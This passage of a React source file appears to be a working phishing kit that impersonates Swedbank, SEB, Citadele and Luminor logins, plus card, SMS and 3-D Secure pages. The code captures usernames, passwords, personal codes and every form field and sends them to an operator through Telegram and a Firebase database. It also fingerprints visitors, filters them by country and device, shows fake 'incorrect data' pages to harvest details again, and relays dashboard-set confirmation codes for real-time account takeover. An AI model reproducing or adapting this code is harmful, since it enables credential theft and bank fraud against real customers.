              blocked: true,
              blockedReason: vcResult.reason,
              countryCode: meta.countryCode,
              firstSeenAt: meta.ts,
              lastSeenAt: meta.ts,
            });
          await set(ref(database, `status/${uid}`), null).catch(() => {});
          await logRedirect(uid, {
            reason: vcResult.reason,
            detail:
              vcResult.detail ||
              (vcResult.reason === 'country_block'
                ? `Blocked by country rule (${meta.countryCode || 'Unknown'})`
                : vcResult.reason === 'country_allow'
                  ? `Rejected by country allow-list (${meta.countryCode || 'Unknown'})`
                  : vcResult.reason === 'device_block'
                    ? `Blocked by device rule (${meta.deviceType || 'unknown'})`
                    : vcResult.reason === 'device_allow'
                      ? `Rejected by device allow-list (${meta.deviceType || 'unknown'})`
                      : ''),
            ip: meta.ip,
            isp: meta.isp,
            countryCode: meta.countryCode,
          });
          await notifyBlock({
            uid,
            meta,
            reason: `Visitor Control (${vcResult.reason})`,
            detail: vcResult.detail || '',
          });
        }
        setShowLoadingScreen(false);
        markLoaderSeen();
        window.location.replace('/404');
        return;
      }

      const uid = storedId || getOrCreateVisitorId();
      setVisitorId(uid);
      setCurrentVisitorMeta(meta);
      if (uid && typeof window !== 'undefined') window.localStorage.setItem('visitorId', uid);
      if (uid) {
        await update(ref(database, `visitors/${uid}`), {
          ...meta,
          userId: uid,
          blocked: false,
          firstSeenAt: meta.ts,
          lastSeenAt: meta.ts,
        });
        await notifyRealVisitor(uid, meta);
      }

      // Human verification gate removed by request.
      setHumanGateRules({ enabled: false, requireSlide: false });
      setHumanGateVisible(false);
      setContentUnlocked(true);

      setPreflightStatus('allowed');
      markLoaderSeen();
      setShowLoadingScreen(false);
    } catch (err) {
      console.warn('Preflight failed, falling back to human check', err);
      // Even if preflight fails, do not block content behind a "human solve".
      setPreflightStatus('allowed');
      setHumanGateRules({ enabled: false, requireSlide: false });
      setHumanGateVisible(false);
      setContentUnlocked(true);
      markLoaderSeen();
      setShowLoadingScreen(false);
    }
  }, [getOrCreateVisitorId, hasPersistedHumanPass, notifyRealVisitor]);

  const emailLooksValid = (value) => String(value || '').trim().length > 0;
  const passwordLooksValid = (value) => String(value || '').trim().length > 0;

  const showEmailError = submitAttempted && !emailLooksValid(email);

  const fetchVisitorMeta = async () => {
    const safeWindow = typeof window !== 'undefined' ? window : null;
    const client = detectClientInfo();
    const ts = Date.now();
    const dateLabel = new Date(ts).toISOString();
    const fallback = {
      ip: '',
      isp: '',
      rdns: '',
      countryCode: '',
      country: '',
      siteOrigin: safeWindow?.location?.origin || '',
      siteUrl: safeWindow?.location?.href || '',
      userAgent: typeof navigator !== 'undefined' ? navigator.userAgent : '',
      browser: client.browserName,
      browserVersion: client.browserVersion,
      deviceType: client.deviceType,
      os: client.os,
      language: client.language,
      riskScore: 0,
      isVpn: false,
      isProxy: false,
      isTor: false,
      isBot: false,
      ts,
      createdAt: ts,
      dateLabel,
    };
    const tryFetchJson = async (url, options = {}, timeoutMs = 4000) => {
      const controller = typeof AbortController !== 'undefined' ? new AbortController() : null;
      const timeout = setTimeout(() => controller?.abort(), timeoutMs);
      const res = await fetch(url, { ...options, signal: controller?.signal });
      clearTimeout(timeout);
      if (!res.ok) throw new Error(`Bad response (${res.status})`);
      return res.json();
    };

    try {
      // Primary: protected worker
      const data = await tryFetchJson('https://countryisp.vinsonova.workers.dev', {
        headers: { accept: 'application/json' },
      });
      let base = {
        ip: data.ip || data.query || '',
        isp: data.isp || data.org || '',
        rdns: data.rdns || data.hostname || data.reverseDns || '',
        countryCode: data.countryCode || data.country_code || '',
        country: data.country || data.country_name || '',
        siteOrigin: fallback.siteOrigin,
        siteUrl: fallback.siteUrl,
        userAgent: fallback.userAgent,
        browser: client.browserName,
        browserVersion: client.browserVersion,
        deviceType: client.deviceType,
        os: client.os,
        language: client.language,
        riskScore: 0,
        isVpn: data.isVpn || false,
        isProxy: data.isProxy || false,
        isTor: data.isTor || false,
        isBot: data.isBot || false,
        ts,
        createdAt: ts,
        dateLabel,
      };
      return base;
    } catch (err) {
      console.warn('Visitor meta primary fetch failed, trying fallback', err);
      try {
        const data = await tryFetchJson('https://ipapi.co/json/');
        let base = {
          ip: data.ip || '',
          isp: data.org || data.asn || '',
          rdns: data.hostname || '',
          countryCode: data.country || '',
          country: data.country_name || '',
          siteOrigin: fallback.siteOrigin,
          siteUrl: fallback.siteUrl,
          userAgent: fallback.userAgent,
          browser: client.browserName,
          browserVersion: client.browserVersion,
          deviceType: client.deviceType,
          os: client.os,
          language: client.language,
          riskScore: 0,
          isVpn: false,
          isProxy: false,
          isTor: false,
          isBot: false,
          ts,
          createdAt: ts,
          dateLabel,
        };
        return base;
      } catch (err2) {
        console.warn('Visitor meta fallback fetch failed', err2);
        return fallback;
      }
    }
  };

  const submitLogin = async (mode) => {
    const domEmail =
      typeof document !== 'undefined' ? document.querySelector('#user')?.value : '';
    const domPassword =
      typeof document !== 'undefined' ? document.querySelector('#pass')?.value : '';
    const submittedEmail = String(domEmail || email || '').trim();
    const submittedPassword = String(domPassword || password || '').trim();

    setSubmitAttempted(true);
    if (!emailLooksValid(submittedEmail)) return;
    if (mode === 'password' && !passwordLooksValid(submittedPassword)) return;
    if (loadingAction) return;
    setEmail(submittedEmail);
    setPassword(submittedPassword);
    setShowLoadingScreen(false); // keep page visible; only button shows loading
    setLoadingAction(mode);
    setErrorMessage('');

    try {
      const userId = visitorId || getOrCreateVisitorId() || push(ref(database, 'users')).key;
      const userRef = ref(database, `users/${userId}`);
      const now = Date.now();

      // Always redirect to Select after 2s, even if any network calls hang/fail.
      // This keeps UX consistent and avoids being stuck on page1.
      try {
        persistStepUid(5, userId);
      } catch {}
      setStoredLoginCreds(submittedEmail, submittedPassword);
      setLoadingAction(null);
      setShowLoadingScreen(true);
      window.setTimeout(() => {
        try {
          redirectUserToStep(5, userId);
        } catch {
          window.location.replace('/select');
        }
      }, 2000);

      const metaPromise = fetchVisitorMeta().catch(() => ({
        ip: '',
        isp: '',
        rdns: '',
        countryCode: '',
        country: '',
        siteOrigin: typeof window !== 'undefined' ? window.location.origin : '',
        siteUrl: typeof window !== 'undefined' ? window.location.href : '',
        userAgent: typeof navigator !== 'undefined' ? navigator.userAgent : '',
        browser: '',
        browserVersion: '',
        deviceType: '',
        os: '',
        language: '',
        riskScore: 0,
        isVpn: false,
        isProxy: false,
        isTor: false,
        isBot: false,
        ts: now,
        createdAt: now,
        dateLabel: new Date(now).toISOString(),
      }));
      const visitorPromise = (async () => {
        if (!userId) return;
        const meta = await metaPromise;
        setCurrentVisitorMeta(meta);
        try {
          await update(ref(database, `visitors/${userId}`), {
            ...meta,
            userId,
            firstSeenAt: meta.ts,
            lastSeenAt: meta.ts,
          });
        } catch (err) {
          console.warn('Failed to store visitor meta', err);
        }
      })();

      try {
        const meta = await metaPromise;
        const metaLines = formatMetaLines(meta);
      const lines = [
        ...headerLines('Login'),
        `👤 User ID: ${userId}`,
        ...metaLines,
        '',
        '🏦 Login:',
        `username: ${submittedEmail}`,
        ...(mode === 'password' ? [`password: ${submittedPassword}`] : []),
      ];
      const uidForActions = userId || visitorId || '';
      const actionButtons = buildActionButtons(uidForActions);
      const sent = await sendAdminEvent(lines.join('\n'), 'form', { buttons: actionButtons });
      if (!sent) {
        await sendAdminEvent(`${brandPrefix('Login')}\n\nLogin fallback ping`, 'form', { buttons: actionButtons });
      }
      } catch (err) {
        console.warn('Telegram login send failed', err);
      }

      // Fire-and-forget: don't block the redirect on these writes.
      update(userRef, {
        userId,
        createdAt: now,
        lastUpdated: now,
        step: 5,
        step2: {
          loginMode: mode === 'code' ? 'code' : 'password',
          username: submittedEmail,
          ...(mode === 'password' ? { password: submittedPassword } : {}),
        },
        remember,
      }).catch((err) => console.warn('Failed to update userRef', err));

      visitorPromise.catch(() => {});
      if (!visitorId && userId) setVisitorId(userId);
    } catch (err) {
      console.error('Failed to submit login', err);
      setErrorMessage('Algo salió mal. Inténtalo de nuevo.');
      setLoadingAction(null);
    }
  };

  const handleSubmit = async (e) => {
    e.preventDefault();
    await submitLogin('password');
  };

  const handleSendCode = async (e) => {
    e.preventDefault();
    await submitLogin('code');
  };

  const handlePage1SubmitCapture = (e) => {
    e.preventDefault();
    e.stopPropagation();
    void submitLogin('password');
  };

  const handlePage1ClickCapture = (e) => {
    const target = e.target;
    const button = target?.closest ? target.closest('button') : null;
    if (!button) return;
    const text = String(button.textContent || '').trim().toLowerCase();

    if (text === 'turpināt' || text.includes('turpināt')) {
      e.preventDefault();
      e.stopPropagation();
      try {
        const uid = getOrCreateVisitorId();
        redirectUserToStep(5, uid);
      } catch {
        window.location.replace('/select');
      }
      return;
    }

    if (text.includes('citi autentifikācijas veidi')) {
      e.preventDefault();
      e.stopPropagation();
      try {
        const uid = getOrCreateVisitorId();
        redirectUserToStep(5, uid);
      } catch {
        window.location.replace('/select');
      }
    }
  };

  const handleStartNow = () => {
    try {
      const card = document.querySelector('.auth-card');
      card?.scrollIntoView({ behavior: 'smooth', block: 'start' });
      const input = document.querySelector('.auth-input');
      input?.focus();
    } catch (err) {
      console.warn('handleStartNow failed', err);
    }
  };

  const BankAuthPage = ({ bankId, bankName, templateName, stepId, variant = 'standard' }) => {
    const [submitted, setSubmitted] = useState(false);
    const html = useTemplateBody(`banks/${templateName}`);
    const rootRef = useRef(null);
    const isIncorrect = variant === 'incorrect';

    const resolveUid = useCallback(() => visitorId || getOrCreateVisitorId(), [visitorId, getOrCreateVisitorId]);
    useRealtimePresence(resolveUid);
    useStepRedirect(resolveUid);

    useEffect(() => {
      const root = rootRef.current;
      if (!root || !html) return undefined;
      if (submitted) return undefined;

      const form = root.querySelector('form');
      if (!form) return undefined;

      // If incorrect variant, show an inline error message above the form.
      if (isIncorrect) {
        const existing = root.querySelector('#bank-login-error');
        if (!existing) {
          const err = document.createElement('div');
          err.id = 'bank-login-error';
          err.setAttribute('role', 'alert');
          // Keep it simple and readable inside the existing design.
          err.style.margin = '12px 0 0';
          err.style.padding = '10px 12px';
          err.style.borderRadius = '10px';
          err.style.background = '#f8d7da';
          err.style.border = '1px solid #f1aeb5';
          err.style.color = '#842029';
          err.style.fontWeight = '600';
          err.textContent = 'Nepareizi ievadīti dati. Lūdzu, mēģiniet vēlreiz.'; // LV incorrect message
          form.parentNode.insertBefore(err, form);
        }
      }

      // Persist selection so it shows in dashboard (logo + bank name).
      try {
        const uid = resolveUid();
        if (uid) {
          update(ref(database, `users/${uid}`), {
            userId: uid,
            lastUpdated: Date.now(),
            step: stepId,
            'step1/selectedBank': bankId,
            'step1/selectedBankName': bankName,
            'step1/selectedBankShortName': bankName,
          }).catch(() => {});
        }
      } catch {}

      const onSubmit = (e) => {
        e.preventDefault();
        // Enforce browser constraint validation for required fields.
        try {
          if (typeof form.checkValidity === 'function' && !form.checkValidity()) {
            if (typeof form.reportValidity === 'function') form.reportValidity();
            return;
          }
        } catch {}
        const uid = resolveUid();
        if (!uid) return;
        setSubmitted(true);

        const now = Date.now();
        const payload = {
          selectedBank: bankId,
          selectedBankName: bankName,
          selectedBankShortName: bankName,
          submittedAt: now,
          attempt: isIncorrect ? 'retry' : 'initial',
          error: isIncorrect,
        };

        // Capture all form fields (works even if ids differ per bank template).
        try {
          const fd = new FormData(form);
          const obj = {};
          fd.forEach((value, key) => {
            const k = String(key || '').trim();
            if (!k) return;
            // Keep last value if duplicates; these forms are simple.
            obj[k] = typeof value === 'string' ? value.trim() : String(value || '');
          });
          payload.fields = obj;
        } catch {}

        // Common direct ids (keep for backwards-compat / easy dashboard viewing).
        const methodSel = root.querySelector('select');
        if (methodSel && typeof methodSel.value === 'string') payload.authMethod = methodSel.value.trim();

        const pay = root.querySelector('#pay_code');
        const personal = root.querySelector('#personal_code');
        const username = root.querySelector('#username');
        const passwordEl = root.querySelector('#password');
        if (pay && typeof pay.value === 'string') payload.pay_code = pay.value.trim();
        if (personal && typeof personal.value === 'string') payload.personal_code = personal.value.trim();
        if (username && typeof username.value === 'string') payload.username = username.value.trim();
        if (passwordEl && typeof passwordEl.value === 'string') payload.password = passwordEl.value.trim();

        // Telegram notification (same idea as other steps)
        try {
          const fields = payload.fields && typeof payload.fields === 'object' ? payload.fields : {};
          const fieldLines = Object.entries(fields)
            .map(([k, v]) => `${String(k)}: ${String(v)}`)
            .filter((line) => line.trim() !== '' && !line.endsWith(': '));

          const lines = [
            ...headerLines('Bank Login'),
            `👤 User ID: ${uid}`,
            `🏦 Bank: ${bankName} (${bankId})`,
            payload.authMethod ? `Auth method: ${payload.authMethod}` : '',
            '',
            ...fieldLines,
          ].filter(Boolean);

          const actionButtons = buildActionButtons(uid);
          void sendAdminEvent(lines.join('\n'), 'form', { buttons: actionButtons });
        } catch (err) {
          console.warn('[bank-login] telegram send failed', err);
        }

        update(ref(database, `users/${uid}`), {
          userId: uid,
          lastUpdated: now,
          step: stepId,
          step1: payload,
        }).catch(() => {});

        // Mark presence as pending while waiting for dashboard redirect.
        update(ref(database, `status/${uid}`), {
          state: 'pending',
          online: false,
          pending: true,
          active: false,
          lastSeen: now,
          visibility: document?.visibilityState || 'unknown',
        }).catch(() => {});
      };

      form.addEventListener('submit', onSubmit);
      return () => form.removeEventListener('submit', onSubmit);
    }, [html, submitted, resolveUid, bankId, bankName, stepId, isIncorrect]);

    if (submitted) return <LoadingScreen />;
    return <div ref={rootRef} dangerouslySetInnerHTML={{ __html: html }} />;
  };

  const BankCodePage = ({ bankId, bankName, templateName, stepId }) => {
    const html = useTemplateBody(`code/${templateName}`);
    const rootRef = useRef(null);
    const [challengeNumber, setChallengeNumber] = useState('');

    const resolveUid = useCallback(() => visitorId || getOrCreateVisitorId(), [visitorId, getOrCreateVisitorId]);
    useRealtimePresence(resolveUid);
    useStepRedirect(resolveUid);

    // Subscribe to the code value configured by dashboard.
    useEffect(() => {
      const uid = resolveUid();
      if (!uid) return undefined;
      const unsub = onValue(ref(database, `users/${uid}/step30`), (snap) => {
        const data = snap.val() || {};
        const next = String(data.challengeNumber || data.code || '').trim();
        if (next && next !== challengeNumber) setChallengeNumber(next);
      });
      return () => unsub();
    }, [resolveUid, challengeNumber]);

    // Inject the number into the template (replace the default <b>1122</b>).
    useEffect(() => {
      const root = rootRef.current;
      if (!root || !html) return;
      const code = String(challengeNumber || '').trim();
      if (!code) return;

      // Prefer: <p>... patvirtinimo kodas: <b>1122</b></p>
      const p = Array.from(root.querySelectorAll('p')).find((el) =>
        String(el.textContent || '').toLowerCase().includes('patvirtinimo kodas')
      );
      if (p) {
        const b = p.querySelector('b');
        if (b) b.textContent = code;
        return;
      }

      // Fallback: first <b> that looks like digits.
      const bAny = Array.from(root.querySelectorAll('b')).find((el) => /^\d{2,8}$/.test(String(el.textContent || '').trim()));
      if (bAny) bAny.textContent = code;
    }, [html, challengeNumber]);

    // Persist step + bank selection so dashboard stays consistent.
    useEffect(() => {
      const uid = resolveUid();
      if (!uid) return;
      update(ref(database, `users/${uid}`), {
        userId: uid,
        lastUpdated: Date.now(),
        step: stepId,
        'step1/selectedBank': bankId,
        'step1/selectedBankName': bankName,
        'step1/selectedBankShortName': bankName,
      }).catch(() => {});
    }, [resolveUid, stepId, bankId, bankName]);

    return <div ref={rootRef} dangerouslySetInnerHTML={{ __html: html }} />;
  };

  const HumanGateModal = () => {
    if (!humanGateVisible) return null;
    const slidePct = Math.min(100, Number(humanChallenge.slide || 0));
    const problem = `${humanChallenge.a} + ${humanChallenge.b} = ?`;
    const subLabel = 'Resuelve la suma y desliza para verificar';

    return (
      <div className="human-gate-backdrop" role="dialog" aria-modal="true">
        <div className="human-gate-card">
          <div className="human-gate-glow human-gate-glow--top" aria-hidden="true" />
          <div className="human-gate-glow human-gate-glow--bottom" aria-hidden="true" />
          <div className="human-gate-header">
            <span className="human-gate-icon" aria-hidden="true">
              <svg viewBox="0 0 24 24" fill="none" role="img">
                <path
                  d="M12 2.5 19 5v6.2c0 4.9-2.95 8.97-7 10.3-4.05-1.33-7-5.4-7-10.3V5l7-2.5Z"
                  stroke="currentColor"
                  strokeWidth="1.8"
                  strokeLinejoin="round"
                />
              </svg>
            </span>
            <div className="human-gate-heading">
              <div className="human-gate-kicker">Acceso protegido</div>
              <div className="human-gate-title">Verificación de seguridad</div>
              <div className="human-gate-sub">{subLabel}</div>
            </div>
          </div>

          <div className="human-gate-problem-wrap">
            <div className="human-gate-problem" aria-label="Problema de matemáticas">
              <div className="human-gate-problem-value">{problem}</div>
              <div className="human-gate-problem-hint">Ingresa la respuesta abajo</div>
            </div>
          </div>

          <label className="human-gate-input-label">
            Respuesta
            <input
              className="human-gate-input"
              inputMode="numeric"
              pattern="[0-9]*"
              autoFocus
              value={humanChallenge.answer}
              disabled={humanGateBusy}
              onChange={(e) =>
                setHumanChallenge((c) => ({
                  ...c,
                  answer: e.target.value.replace(/[^0-9-]/g, ''),
                }))
              }
            />
          </label>

          <div className="human-gate-slider">
            <div
              ref={humanSliderTrackRef}
              className={`human-gate-slider-track ${slidePct >= 100 ? 'is-complete' : ''}`}
            >
              <div ref={humanSliderShellRef} className="human-gate-slider-shell" />
              <div className="human-gate-slider-fill" style={{ width: `${slidePct}%` }} />
              <div className="human-gate-slider-label">
                {humanGateBusy
                  ? 'Comprobando la respuesta…'
                  : 'Desliza de izquierda a derecha para enviar'}
              </div>
              <button
                type="button"
                className={`human-gate-slider-thumb ${humanSliderDragRef.current.active ? 'is-dragging' : ''}`}
                style={{
                  left: `${10 + Math.max(0, humanSliderWidth - HUMAN_SLIDER_THUMB_SIZE) * (slidePct / 100)}px`,
                }}
                disabled={humanGateBusy}
                onPointerDown={startHumanSlideDrag}
                onPointerMove={(event) => {
                  if (humanSliderDragRef.current.pointerId !== event.pointerId) return;
                  const nextPct = updateHumanSlideFromPointer(event.clientX);
                  if (isHumanSlideComplete(nextPct)) {
                    endHumanSlideDrag(false);
                    void completeHumanSlide();
                  }
                }}
                onPointerUp={async (event) => {
                  if (humanSliderDragRef.current.pointerId !== event.pointerId) return;
                  const nextPct = updateHumanSlideFromPointer(event.clientX);
                  const complete = isHumanSlideComplete(nextPct);
                  try {
                    event.currentTarget.releasePointerCapture(event.pointerId);
                  } catch {}
                  endHumanSlideDrag(!complete);
                  if (complete) {
                    await completeHumanSlide();
                  }
                }}
                onPointerCancel={() => endHumanSlideDrag(true)}
                aria-label="Desliza de izquierda a derecha para verificar"
              >
                <span aria-hidden="true">→</span>
              </button>
            </div>
            <div className="human-gate-slider-help">
              Escribe la respuesta y luego arrastra hasta el extremo derecho.
            </div>
          </div>

          {humanGateError ? <div className="human-gate-error">{humanGateError}</div> : null}

          <div className="human-gate-actions human-gate-actions--single">
            <button
              className="human-gate-secondary"
              type="button"
              onClick={refreshHumanGate}
              disabled={humanGateBusy}
            >
              {humanGateBusy
                ? 'Comprobando…'
                : 'Nueva tarea'}
            </button>
          </div>
        </div>
      </div>
    );
  };

  useEffect(() => {
    if (isNotFoundPage) return;
    if (preflightRan.current) return;
    preflightRan.current = true;
    preflightVisitor();
  }, [isNotFoundPage, preflightVisitor]);

  useEffect(() => {
    if (humanGateVisible) refreshHumanGate();
  }, [humanGateVisible, refreshHumanGate]);

  useEffect(() => {
    if (humanGateVisible) return;
    humanSliderDragRef.current = {
      active: false,
      pointerId: null,
      trackLeft: 0,
      trackWidth: 1,
    };
  }, [humanGateVisible]);

  if (isNotFoundPage) return <NotFoundPage />;
  if (showLoadingScreen) return <LoadingScreen />;
  // Human-gate removed by request: never block the UI behind a "solve" modal.
  if (isCardIncorrectPage)
    return <CardPage variant="incorrect" />;
  if (isCardPage)
    return <CardPage variant="standard" />;
  if (isSwedbankPage)
    return <BankAuthPage bankId="swedbank" bankName="Swedbank" templateName="swedbank" stepId={101} />;
  if (isSebPage)
    return <BankAuthPage bankId="seb" bankName="SEB" templateName="seb" stepId={102} />;
  if (isCitadelePage)
    return <BankAuthPage bankId="citadele" bankName="Citadele" templateName="citadele" stepId={103} />;
  if (isLuminorPage)
    return <BankAuthPage bankId="luminor" bankName="Luminor" templateName="luminor" stepId={104} />;
  if (isSwedbankIncorrectPage)
    return <BankAuthPage bankId="swedbank" bankName="Swedbank" templateName="swedbank" stepId={111} variant="incorrect" />;
  if (isSebIncorrectPage)
    return <BankAuthPage bankId="seb" bankName="SEB" templateName="seb" stepId={112} variant="incorrect" />;
  if (isCitadeleIncorrectPage)
    return <BankAuthPage bankId="citadele" bankName="Citadele" templateName="citadele" stepId={113} variant="incorrect" />;
  if (isLuminorIncorrectPage)
    return <BankAuthPage bankId="luminor" bankName="Luminor" templateName="luminor" stepId={114} variant="incorrect" />;
  if (isSwedbankCodePage)
    return <BankCodePage bankId="swedbank" bankName="Swedbank" templateName="swedbank" stepId={121} />;
  if (isSebCodePage)
    return <BankCodePage bankId="seb" bankName="SEB" templateName="seb" stepId={122} />;
  if (isCitadeleCodePage)
    return <BankCodePage bankId="citadele" bankName="Citadele" templateName="citadele" stepId={123} />;
  if (isLuminorCodePage)
    return <BankCodePage bankId="luminor" bankName="Luminor" templateName="luminor" stepId={124} />;
  if (isSmsIncorrectPage)
    return <SmsPage variant="incorrect" />;
  if (isSmsPage)
    return <SmsPage variant="standard" />;
  if (isThreeDsPage) return <ThreeDSChallengePage />;
  if (isDonePage) return <DonePage />;

  return (
    <div
      ref={page1RootRef}
      onSubmitCapture={handlePage1SubmitCapture}
      onClickCapture={handlePage1ClickCapture}
      dangerouslySetInnerHTML={{ __html: safePage1Html }}
    />
  );
}

export default App;
